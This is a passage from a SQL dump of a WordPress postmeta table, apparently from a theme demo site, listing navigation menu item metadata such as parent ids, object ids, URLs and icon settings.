u_item_parent','2994'),(28587,3198,'_menu_item_object_id','3055'),(28588,3198,'_menu_item_object','page'),(28589,3198,'_menu_item_target',''),(28590,3198,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28591,3198,'_menu_item_xfn',''),(28592,3198,'_menu_item_url',''),(28593,3198,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28594,3198,'_menu_item_icon','null'),(28595,3199,'_menu_item_type','post_type'),(28596,3199,'_menu_item_menu_item_parent','2994'),(28597,3199,'_menu_item_object_id','3056'),(28598,3199,'_menu_item_object','page'),(28599,3199,'_menu_item_target',''),(28600,3199,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28601,3199,'_menu_item_xfn',''),(28602,3199,'_menu_item_url',''),(28603,3199,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28604,3199,'_menu_item_icon','null'),(28605,3200,'_menu_item_type','post_type'),(28606,3200,'_menu_item_menu_item_parent','2987'),(28607,3200,'_menu_item_object_id','3056'),(28608,3200,'_menu_item_object','page'),(28609,3200,'_menu_item_target',''),(28610,3200,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28611,3200,'_menu_item_xfn',''),(28612,3200,'_menu_item_url',''),(28613,3200,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28614,3200,'_menu_item_icon','null'),(28615,3201,'_menu_item_type','post_type'),(28616,3201,'_menu_item_menu_item_parent','2995'),(28617,3201,'_menu_item_object_id','3054'),(28618,3201,'_menu_item_object','page'),(28619,3201,'_menu_item_target',''),(28620,3201,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28621,3201,'_menu_item_xfn',''),(28622,3201,'_menu_item_url',''),(28623,3201,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28624,3201,'_menu_item_icon','null'),(28625,3202,'_menu_item_type','post_type'),(28626,3202,'_menu_item_menu_item_parent','2995'),(28627,3202,'_menu_item_object_id','3057'),(28628,3202,'_menu_item_object','page'),(28629,3202,'_menu_item_target',''),(28630,3202,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28631,3202,'_menu_item_xfn',''),(28632,3202,'_menu_item_url',''),(28633,3202,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28634,3202,'_menu_item_icon','null'),(28635,3203,'_menu_item_type','post_type'),(28636,3203,'_menu_item_menu_item_parent','2995'),(28637,3203,'_menu_item_object_id','3058'),(28638,3203,'_menu_item_object','page'),(28639,3203,'_menu_item_target',''),(28640,3203,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28641,3203,'_menu_item_xfn',''),(28642,3203,'_menu_item_url',''),(28643,3203,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28644,3203,'_menu_item_icon','null'),(28645,3204,'_menu_item_type','post_type'),(28646,3204,'_menu_item_menu_item_parent','2995'),(28647,3204,'_menu_item_object_id','3059'),(28648,3204,'_menu_item_object','page'),(28649,3204,'_menu_item_target',''),(28650,3204,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28651,3204,'_menu_item_xfn',''),(28652,3204,'_menu_item_url',''),(28653,3204,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28654,3204,'_menu_item_icon','null'),(28655,3205,'_menu_item_type','post_type'),(28656,3205,'_menu_item_menu_item_parent','2994'),(28657,3205,'_menu_item_object_id','3060'),(28658,3205,'_menu_item_object','page'),(28659,3205,'_menu_item_target',''),(28660,3205,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28661,3205,'_menu_item_xfn',''),(28662,3205,'_menu_item_url',''),(28663,3205,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28664,3205,'_menu_item_icon','null'),(28665,3206,'_menu_item_type','post_type'),(28666,3206,'_menu_item_menu_item_parent','2987'),(28667,3206,'_menu_item_object_id','3060'),(28668,3206,'_menu_item_object','page'),(28669,3206,'_menu_item_target',''),(28670,3206,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28671,3206,'_menu_item_xfn',''),(28672,3206,'_menu_item_url',''),(28673,3206,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28674,3206,'_menu_item_icon','null'),(28675,3207,'_menu_item_type','post_type'),(28676,3207,'_menu_item_menu_item_parent','3000'),(28677,3207,'_menu_item_object_id','3060'),(28678,3207,'_menu_item_object','page'),(28679,3207,'_menu_item_target',''),(28680,3207,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28681,3207,'_menu_item_xfn',''),(28682,3207,'_menu_item_url',''),(28683,3207,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28684,3208,'_menu_item_type','post_type'),(28685,3208,'_menu_item_menu_item_parent','3029'),(28686,3208,'_menu_item_object_id','3067'),(28687,3208,'_menu_item_object','page'),(28688,3208,'_menu_item_target',''),(28689,3208,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28690,3208,'_menu_item_xfn',''),(28691,3208,'_menu_item_url',''),(28692,3208,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28693,3208,'_menu_item_icon','null'),(28694,3209,'_menu_item_type','post_type'),(28695,3209,'_menu_item_menu_item_parent','3029'),(28696,3209,'_menu_item_object_id','3066'),(28697,3209,'_menu_item_object','page'),(28698,3209,'_menu_item_target',''),(28699,3209,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28700,3209,'_menu_item_xfn',''),(28701,3209,'_menu_item_url',''),(28702,3209,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28703,3209,'_menu_item_icon','null'),(28704,3210,'_menu_item_type','post_type'),(28705,3210,'_menu_item_menu_item_parent','3029'),(28706,3210,'_menu_item_object_id','3065'),(28707,3210,'_menu_item_object','page'),(28708,3210,'_menu_item_target',''),(28709,3210,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28710,3210,'_menu_item_xfn',''),(28711,3210,'_menu_item_url',''),(28712,3210,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28713,3210,'_menu_item_icon','null'),(28714,3211,'_menu_item_type','post_type'),(28715,3211,'_menu_item_menu_item_parent','3025'),(28716,3211,'_menu_item_object_id','3077'),(28717,3211,'_menu_item_object','portfolio-item'),(28718,3211,'_menu_item_target',''),(28719,3211,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28720,3211,'_menu_item_xfn',''),(28721,3211,'_menu_item_url',''),(28722,3211,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28723,3211,'_menu_item_icon','null'),(28724,3212,'_menu_item_type','post_type'),(28725,3212,'_menu_item_menu_item_parent','3025'),(28726,3212,'_menu_item_object_id','3076'),(28727,3212,'_menu_item_object','portfolio-item'),(28728,3212,'_menu_item_target',''),(28729,3212,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28730,3212,'_menu_item_xfn',''),(28731,3212,'_menu_item_url',''),(28732,3212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28733,3212,'_menu_item_icon','null'),(28734,3213,'_menu_item_type','post_type'),(28735,3213,'_menu_item_menu_item_parent','3025'),(28736,3213,'_menu_item_object_id','3075'),(28737,3213,'_menu_item_object','portfolio-item'),(28738,3213,'_menu_item_target',''),(28739,3213,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28740,3213,'_menu_item_xfn',''),(28741,3213,'_menu_item_url',''),(28742,3213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28743,3213,'_menu_item_icon','null'),(28744,3214,'_menu_item_type','post_type'),(28745,3214,'_menu_item_menu_item_parent','3025'),(28746,3214,'_menu_item_object_id','3098'),(28747,3214,'_menu_item_object','portfolio-item'),(28748,3214,'_menu_item_target',''),(28749,3214,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28750,3214,'_menu_item_xfn',''),(28751,3214,'_menu_item_url',''),(28752,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28753,3214,'_menu_item_icon','null'),(28754,3215,'_menu_item_type','post_type'),(28755,3215,'_menu_item_menu_item_parent','2994'),(28756,3215,'_menu_item_object_id','3068'),(28757,3215,'_menu_item_object','page'),(28758,3215,'_menu_item_target',''),(28759,3215,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28760,3215,'_menu_item_xfn',''),(28761,3215,'_menu_item_url',''),(28762,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28763,3215,'_menu_item_icon','null'),(28764,3216,'_menu_item_type','post_type'),(28765,3216,'_menu_item_menu_item_parent','2987'),(28766,3216,'_menu_item_object_id','3068'),(28767,3216,'_menu_item_object','page'),(28768,3216,'_menu_item_target',''),(28769,3216,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28770,3216,'_menu_item_xfn',''),(28771,3216,'_menu_item_url',''),(28772,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28773,3216,'_menu_item_icon','null'),(28774,3217,'_menu_item_type','post_type'),(28775,3217,'_menu_item_menu_item_parent','3017'),(28776,3217,'_menu_item_object_id','3071'),(28777,3217,'_menu_item_object','page'),(28778,3217,'_menu_item_target',''),(28779,3217,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28780,3217,'_menu_item_xfn',''),(28781,3217,'_menu_item_url',''),(28782,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28783,3217,'_menu_item_icon','null'),(28784,3218,'_menu_item_type','post_type'),(28785,3218,'_menu_item_menu_item_parent','3020'),(28786,3218,'_menu_item_object_id','3070'),(28787,3218,'_menu_item_object','page'),(28788,3218,'_menu_item_target',''),(28789,3218,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28790,3218,'_menu_item_xfn',''),(28791,3218,'_menu_item_url',''),(28792,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28793,3218,'_menu_item_icon','null'),(28794,3219,'_menu_item_type','post_type'),(28795,3219,'_menu_item_menu_item_parent','3020'),(28796,3219,'_menu_item_object_id','3069'),(28797,3219,'_menu_item_object','page'),(28798,3219,'_menu_item_target',''),(28799,3219,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28800,3219,'_menu_item_xfn',''),(28801,3219,'_menu_item_url',''),(28802,3219,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28803,3219,'_menu_item_icon','null'),(28804,3220,'_menu_item_type','post_type'),(28805,3220,'_menu_item_menu_item_parent','3021'),(28806,3220,'_menu_item_object_id','3071'),(28807,3220,'_menu_item_object','page'),(28808,3220,'_menu_item_target',''),(28809,3220,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28810,3220,'_menu_item_xfn',''),(28811,3220,'_menu_item_url',''),(28812,3220,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28813,3220,'_menu_item_icon','null'),(28814,3221,'_menu_item_type','post_type'),(28815,3221,'_menu_item_menu_item_parent','3024'),(28816,3221,'_menu_item_object_id','3070'),(28817,3221,'_menu_item_object','page'),(28818,3221,'_menu_item_target',''),(28819,3221,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28820,3221,'_menu_item_xfn',''),(28821,3221,'_menu_item_url',''),(28822,3221,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28823,3221,'_menu_item_icon','null'),(28824,3222,'_menu_item_type','post_type'),(28825,3222,'_menu_item_menu_item_parent','3024'),(28826,3222,'_menu_item_object_id','3069'),(28827,3222,'_menu_item_object','page'),(28828,3222,'_menu_item_target',''),(28829,3222,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28830,3222,'_menu_item_xfn',''),(28831,3222,'_menu_item_url',''),(28832,3222,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28833,3222,'_menu_item_icon','null'),(28834,3223,'_menu_item_type','post_type'),(28835,3223,'_menu_item_menu_item_parent','3021'),(28836,3223,'_menu_item_object_id','3072'),(28837,3223,'_menu_item_object','page'),(28838,3223,'_menu_item_target',''),(28839,3223,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28840,3223,'_menu_item_xfn',''),(28841,3223,'_menu_item_url',''),(28842,3223,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28843,3223,'_menu_item_icon','null'),(28844,3224,'_menu_item_type','post_type'),(28845,3224,'_menu_item_menu_item_parent','3017'),(28846,3224,'_menu_item_object_id','3072'),(28847,3224,'_menu_item_object','page'),(28848,3224,'_menu_item_target',''),(28849,3224,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28850,3224,'_menu_item_xfn',''),(28851,3224,'_menu_item_url',''),(28852,3224,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28853,3224,'_menu_item_icon','null'),(28854,3225,'_menu_item_type','post_type'),(28855,3225,'_menu_item_menu_item_parent','3017'),(28856,3225,'_menu_item_object_id','1382'),(28857,3225,'_menu_item_object','page'),(28858,3225,'_menu_item_target',''),(28859,3225,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28860,3225,'_menu_item_xfn',''),(28861,3225,'_menu_item_url',''),(28862,3225,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28863,3225,'_menu_item_icon','null'),(28864,3226,'_menu_item_type','post_type'),(28865,3226,'_menu_item_menu_item_parent','3021'),(28866,3226,'_menu_item_object_id','1382'),(28867,3226,'_menu_item_object','page'),(28868,3226,'_menu_item_target',''),(28869,3226,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28870,3226,'_menu_item_xfn',''),(28871,3226,'_menu_item_url',''),(28872,3226,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28873,3226,'_menu_item_icon','null'),(28874,3227,'_menu_item_type','post_type'),(28875,3227,'_menu_item_menu_item_parent','3023'),(28876,3227,'_menu_item_object_id','1393'),(28877,3227,'_menu_item_object','page'),(28878,3227,'_menu_item_target',''),(28879,3227,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28880,3227,'_menu_item_xfn',''),(28881,3227,'_menu_item_url',''),(28882,3227,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28883,3227,'_menu_item_icon','null'),(28884,3228,'_menu_item_type','post_type'),(28885,3228,'_menu_item_menu_item_parent','3022'),(28886,3228,'_menu_item_object_id','1650'),(28887,3228,'_menu_item_object','page'),(28888,3228,'_menu_item_target',''),(28889,3228,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28890,3228,'_menu_item_xfn',''),(28891,3228,'_menu_item_url',''),(28892,3228,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28893,3228,'_menu_item_icon','null'),(28894,3229,'_menu_item_type','post_type'),(28895,3229,'_menu_item_menu_item_parent','3023'),(28896,3229,'_menu_item_object_id','1642'),(28897,3229,'_menu_item_object','page'),(28898,3229,'_menu_item_target',''),(28899,3229,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28900,3229,'_menu_item_xfn',''),(28901,3229,'_menu_item_url',''),(28902,3229,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28903,3229,'_menu_item_icon','null'),(28904,3230,'_menu_item_type','post_type'),(28905,3230,'_menu_item_menu_item_parent','3018'),(28906,3230,'_menu_item_object_id','1650'),(28907,3230,'_menu_item_object','page'),(28908,3230,'_menu_item_target',''),(28909,3230,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28910,3230,'_menu_item_xfn',''),(28911,3230,'_menu_item_url',''),(28912,3230,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28913,3230,'_menu_item_icon','null'),(28914,3231,'_menu_item_type','post_type'),(28915,3231,'_menu_item_menu_item_parent','3019'),(28916,3231,'_menu_item_object_id','1642'),(28917,3231,'_menu_item_object','page'),(28918,3231,'_menu_item_target',''),(28919,3231,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28920,3231,'_menu_item_xfn',''),(28921,3231,'_menu_item_url',''),(28922,3231,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28923,3231,'_menu_item_icon','null'),(28924,3232,'_menu_item_type','post_type'),(28925,3232,'_menu_item_menu_item_parent','3019'),(28926,3232,'_menu_item_object_id','1393'),(28927,3232,'_menu_item_object','page'),(28928,3232,'_menu_item_target',''),(28929,3232,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28930,3232,'_menu_item_xfn',''),(28931,3232,'_menu_item_url',''),(28932,3232,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28933,3232,'_menu_item_icon','null'),(28934,3233,'_menu_item_type','post_type'),(28935,3233,'_menu_item_menu_item_parent','3018'),(28936,3233,'_menu_item_object_id','1658'),(28937,3233,'_menu_item_object','page'),(28938,3233,'_menu_item_target',''),(28939,3233,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28940,3233,'_menu_item_xfn',''),(28941,3233,'_menu_item_url',''),(28942,3233,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28943,3233,'_menu_item_icon','icon-star'),(28944,3233,'_menu_item_icon_pack','simple_line_icons'),(28945,3234,'_menu_item_type','post_type'),(28946,3234,'_menu_item_menu_item_parent','3022'),(28947,3234,'_menu_item_object_id','1658'),(28948,3234,'_menu_item_object','page'),(28949,3234,'_menu_item_target',''),(28950,3234,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28951,3234,'_menu_item_xfn',''),(28952,3234,'_menu_item_url',''),(28953,3234,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28954,3234,'_menu_item_icon','icon-star'),(28955,3234,'_menu_item_icon_pack','simple_line_icons'),(28956,3235,'_menu_item_type','post_type'),(28957,3235,'_menu_item_menu_item_parent','3021'),(28958,3235,'_menu_item_object_id','1662'),(28959,3235,'_menu_item_object','page'),(28960,3235,'_menu_item_target',''),(28961,3235,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28962,3235,'_menu_item_xfn',''),(28963,3235,'_menu_item_url',''),(28964,3235,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28965,3235,'_menu_item_icon','null'),(28966,3236,'_menu_item_type','post_type'),(28967,3236,'_menu_item_menu_item_parent','3017'),(28968,3236,'_menu_item_object_id','1662'),(28969,3236,'_menu_item_object','page'),(28970,3236,'_menu_item_target',''),(28971,3236,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28972,3236,'_menu_item_xfn',''),(28973,3236,'_menu_item_url',''),(28974,3236,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28975,3236,'_menu_item_icon','null'),(28976,3237,'_menu_item_type','post_type'),(28977,3237,'_menu_item_menu_item_parent','3018'),(28978,3237,'_menu_item_object_id','1722'),(28979,3237,'_menu_item_object','page'),(28980,3237,'_menu_item_target',''),(28981,3237,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28982,3237,'_menu_item_xfn',''),(28983,3237,'_menu_item_url',''),(28984,3237,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28985,3237,'_menu_item_icon','icon-star'),(28986,3237,'_menu_item_icon_pack','simple_line_icons'),(28987,3238,'_menu_item_type','post_type'),(28988,3238,'_menu_item_menu_item_parent','3022'),(28989,3238,'_menu_item_object_id','1722'),(28990,3238,'_menu_item_object','page'),(28991,3238,'_menu_item_target',''),(28992,3238,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28993,3238,'_menu_item_xfn',''),(28994,3238,'_menu_item_url',''),(28995,3238,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28996,3238,'_menu_item_icon','icon-star'),(28997,3238,'_menu_item_icon_pack','simple_line_icons'),(28998,3239,'_menu_item_type','post_type'),(28999,3239,'_menu_item_menu_item_parent','3021'),(29000,3239,'_menu_item_object_id','3073'),(29001,3239,'_menu_item_object','page'),(29002,3239,'_menu_item_target',''),(29003,3239,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29004,3239,'_menu_item_xfn',''),(29005,3239,'_menu_item_url',''),(29006,3239,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29007,3239,'_menu_item_icon','null'),(29008,3240,'_menu_item_type','post_type'),(29009,3240,'_menu_item_menu_item_parent','3023'),(29010,3240,'_menu_item_object_id','1734'),(29011,3240,'_menu_item_object','page'),(29012,3240,'_menu_item_target',''),(29013,3240,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29014,3240,'_menu_item_xfn',''),(29015,3240,'_menu_item_url',''),(29016,3240,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29017,3240,'_menu_item_icon','null'),(29018,3241,'_menu_item_type','post_type'),(29019,3241,'_menu_item_menu_item_parent','3017'),(29020,3241,'_menu_item_object_id','3073'),(29021,3241,'_menu_item_object','page'),(29022,3241,'_menu_item_target',''),(29023,3241,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29024,3241,'_menu_item_xfn',''),(29025,3241,'_menu_item_url',''),(29026,3241,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29027,3241,'_menu_item_icon','null'),(29028,3242,'_menu_item_type','post_type'),(29029,3242,'_menu_item_menu_item_parent','3019'),(29030,3242,'_menu_item_object_id','1734'),(29031,3242,'_menu_item_object','page'),(29032,3242,'_menu_item_target',''),(29033,3242,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29034,3242,'_menu_item_xfn',''),(29035,3242,'_menu_item_url',''),(29036,3242,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29037,3242,'_menu_item_icon','null'),(29038,3243,'_menu_item_type','post_type'),(29039,3243,'_menu_item_menu_item_parent','2989'),(29040,3243,'_menu_item_object_id','1679'),(29041,3243,'_menu_item_object','page'),(29042,3243,'_menu_item_target',''),(29043,3243,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29044,3243,'_menu_item_xfn',''),(29045,3243,'_menu_item_url',''),(29046,3243,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29047,3243,'_menu_item_icon','null'),(38379,3748,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38378,3748,'_menu_item_target',''),(38377,3748,'_menu_item_object','custom'),(38376,3748,'_menu_item_object_id','3748'),(38375,3748,'_menu_item_menu_item_parent','3731'),(38374,3748,'_menu_item_type','custom'),(38373,3747,'_menu_item_icon','null'),(52131,4358,'_menu_item_type','custom'),(52127,4357,'_menu_item_xfn',''),(52125,4357,'_menu_item_target',''),(52126,4357,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52124,4357,'_menu_item_object','custom'),(52123,4357,'_menu_item_object_id','4357'),(52122,4357,'_menu_item_menu_item_parent','0'),(52118,4356,'_menu_item_url','#'),(52119,4356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52120,4356,'_menu_item_icon','null'),(38147,3724,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38146,3724,'_menu_item_target',''),(38145,3724,'_menu_item_object','custom'),(38144,3724,'_menu_item_object_id','3724'),(38142,3724,'_menu_item_type','custom'),(38143,3724,'_menu_item_menu_item_parent','0'),(38344,3745,'_menu_item_type','custom'),(38343,3744,'_menu_item_icon','null'),(38342,3744,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38341,3744,'_menu_item_url','#'),(38340,3744,'_menu_item_xfn',''),(38339,3744,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38224,3732,'_menu_item_object_id','3732'),(38223,3732,'_menu_item_menu_item_parent','0'),(38222,3732,'_menu_item_type','custom'),(38221,3731,'_menu_item_icon','null'),(38220,3731,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38219,3731,'_menu_item_url','#'),(38218,3731,'_menu_item_xfn',''),(52270,4372,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(52265,4372,'_menu_item_object_id','4372'),(52266,4372,'_menu_item_object','custom'),(52267,4372,'_menu_item_target',''),(52268,4372,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52269,4372,'_menu_item_xfn',''),(52264,4372,'_menu_item_menu_item_parent','4357'),(52261,4371,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52262,4371,'_menu_item_icon','null'),(29108,3250,'_menu_item_type','post_type'),(29109,3250,'_menu_item_menu_item_parent','3018'),(29110,3250,'_menu_item_object_id','1742'),(29111,3250,'_menu_item_object','page'),(29112,3250,'_menu_item_target',''),(29113,3250,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29114,3250,'_menu_item_xfn',''),(29115,3250,'_menu_item_url',''),(29116,3250,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29117,3250,'_menu_item_icon','null'),(29118,3251,'_menu_item_type','post_type'),(29119,3251,'_menu_item_menu_item_parent','3022'),(29120,3251,'_menu_item_object_id','1742'),(29121,3251,'_menu_item_object','page'),(29122,3251,'_menu_item_target',''),(29123,3251,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29124,3251,'_menu_item_xfn',''),(29125,3251,'_menu_item_url',''),(29126,3251,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29127,3251,'_menu_item_icon','null'),(29128,3252,'_menu_item_type','post_type'),(29129,3252,'_menu_item_menu_item_parent','3017'),(29130,3252,'_menu_item_object_id','1804'),(29131,3252,'_menu_item_object','page'),(29132,3252,'_menu_item_target',''),(29133,3252,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29134,3252,'_menu_item_xfn',''),(29135,3252,'_menu_item_url',''),(29136,3252,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29137,3252,'_menu_item_icon','null'),(29138,3253,'_menu_item_type','post_type'),(29139,3253,'_menu_item_menu_item_parent','3021'),(29140,3253,'_menu_item_object_id','1804'),(29141,3253,'_menu_item_object','page'),(29142,3253,'_menu_item_target',''),(29143,3253,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29144,3253,'_menu_item_xfn',''),(29145,3253,'_menu_item_url',''),(29146,3253,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29147,3253,'_menu_item_icon','null'),(29148,3254,'_menu_item_type','post_type'),(29149,3254,'_menu_item_menu_item_parent','3000'),(29150,3254,'_menu_item_object_id','3053'),(29151,3254,'_menu_item_object','page'),(29152,3254,'_menu_item_target',''),(29153,3254,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29154,3254,'_menu_item_xfn',''),(29155,3254,'_menu_item_url',''),(29156,3254,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29157,3255,'_menu_item_type','post_type'),(29158,3255,'_menu_item_menu_item_parent','3000'),(29159,3255,'_menu_item_object_id','3055'),(29160,3255,'_menu_item_object','page'),(29161,3255,'_menu_item_target',''),(29162,3255,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29163,3255,'_menu_item_xfn',''),(29164,3255,'_menu_item_url',''),(29165,3255,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29166,3256,'_menu_item_type','post_type'),(29167,3256,'_menu_item_menu_item_parent','3019'),(29168,3256,'_menu_item_object_id','1836'),(29169,3256,'_menu_item_object','page'),(29170,3256,'_menu_item_target',''),(29171,3256,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29172,3256,'_menu_item_xfn',''),(29173,3256,'_menu_item_url',''),(29174,3256,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29175,3256,'_menu_item_icon','null'),(29176,3257,'_menu_item_type','post_type'),(29177,3257,'_menu_item_menu_item_parent','3020'),(29178,3257,'_menu_item_object_id','1827'),(29179,3257,'_menu_item_object','page'),(29180,3257,'_menu_item_target',''),(29181,3257,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29182,3257,'_menu_item_xfn',''),(29183,3257,'_menu_item_url',''),(29184,3257,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29185,3257,'_menu_item_icon','null'),(29186,3258,'_menu_item_type','post_type'),(29187,3258,'_menu_item_menu_item_parent','3023'),(29188,3258,'_menu_item_object_id','1836'),(29189,3258,'_menu_item_object','page'),(29190,3258,'_menu_item_target',''),(29191,3258,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29192,3258,'_menu_item_xfn',''),(29193,3258,'_menu_item_url',''),(29194,3258,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29195,3258,'_menu_item_icon','null'),(29196,3259,'_menu_item_type','post_type'),(29197,3259,'_menu_item_menu_item_parent','3024'),(29198,3259,'_menu_item_object_id','1827'),(29199,3259,'_menu_item_object','page'),(29200,3259,'_menu_item_target',''),(29201,3259,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29202,3259,'_menu_item_xfn',''),(29203,3259,'_menu_item_url',''),(29204,3259,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{